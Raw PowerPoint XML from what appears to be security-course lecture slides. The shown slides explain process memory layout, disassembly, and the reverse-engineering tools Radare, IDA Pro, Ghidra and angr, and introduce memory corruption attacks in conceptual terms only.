              <a:t>Used for saving the processor status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory-mapping segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used for shared libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Heap section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used for dynamically allocated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data section (Static/global vars)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Initialized variables (.data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Uninitialized variables (.bss)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code/Text section (.text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Marked read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modifications causes segfaults</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985092" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="463801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Code (.text)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985093" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="435226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Data (.data)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985094" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2317835"/>
            <a:ext cx="2590800" cy="507121"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985095" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="1460584"/>
            <a:ext cx="0" cy="3429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400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985096" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="1460584"/>
            <a:ext cx="0" cy="3429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400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985097" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2317835"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985098" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5813969" y="2433211"/>
            <a:ext cx="3175"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400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985099" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5095324" y="4867686"/>
            <a:ext cx="2440918" cy="276999"/>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it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0x08000000)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985100" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5103180" y="1206669"/>
            <a:ext cx="2220304" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0xBFFFFFFF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985101" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3485389"/>
            <a:ext cx="2590800" cy="181071"/>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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985102" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3666461"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6B9B8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985103" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010401" y="3572982"/>
            <a:ext cx="3175"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400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985104" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="1460585"/>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Env/Argv Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985105" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="1746334"/>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Env/Argv Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985106" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2032085"/>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Argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985107" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="406651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Data (.bss)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985108" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3062287"/>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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> Libraries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1481662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Disassembling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling is the process of extracting the assembly representation of a program by analyzing its binary representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassemblers can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linear: linearly parse the instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recursive: attempt to follow the flow of the program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30935990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Radare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Radare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a program analysis tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.radare.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/r/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports reversing and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling of binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forensic analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports collaborative analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19838154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IDA Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDA Pro is the state-of-the-art tool for reversing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hex-rays.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It supports disassembling of binary programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Hex-Rays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be integrated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and other debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product (expensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A limited version is available for free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10838297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D7E9-DDCF-294E-9EB6-809622496795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A386E2E7-47F8-0448-B324-4B4FACBD8D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open-source tool introduced in 2018 by the NSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ghidra-sre.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be easily extended and customized </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18459485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angr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>angr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a framework for the static/dynamic analysis of binary programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>angr.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>angr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supports a number of architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lifts binary code into VEX (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Valgrind’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> intermediate representation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>angr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> supports a number of analyses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic symbolic execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data-dependency analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Value-set analysis (VSA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1730069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Exploiting Memory Corruption Vulnerabilities </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory corruption attacks exploit errors in managing how data is handled during execution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Variables (application-specific)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metadata (control structure for stack and heap)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54556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Roboto Light"/>
            <a:cs typeface="Roboto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14470</TotalTime>
  <Words>18781</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>2613</Paragraphs>
  <Slides>237</Slides>
  <Notes>147</Notes>
  <HiddenSlides>11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237</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="250" baseType="lpstr">
      <vt:lpstr>MS Mincho</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Hack</vt:lpstr>
      <vt:lpstr>Hack Bold</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>ヒラギノ角ゴ Pro W3</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
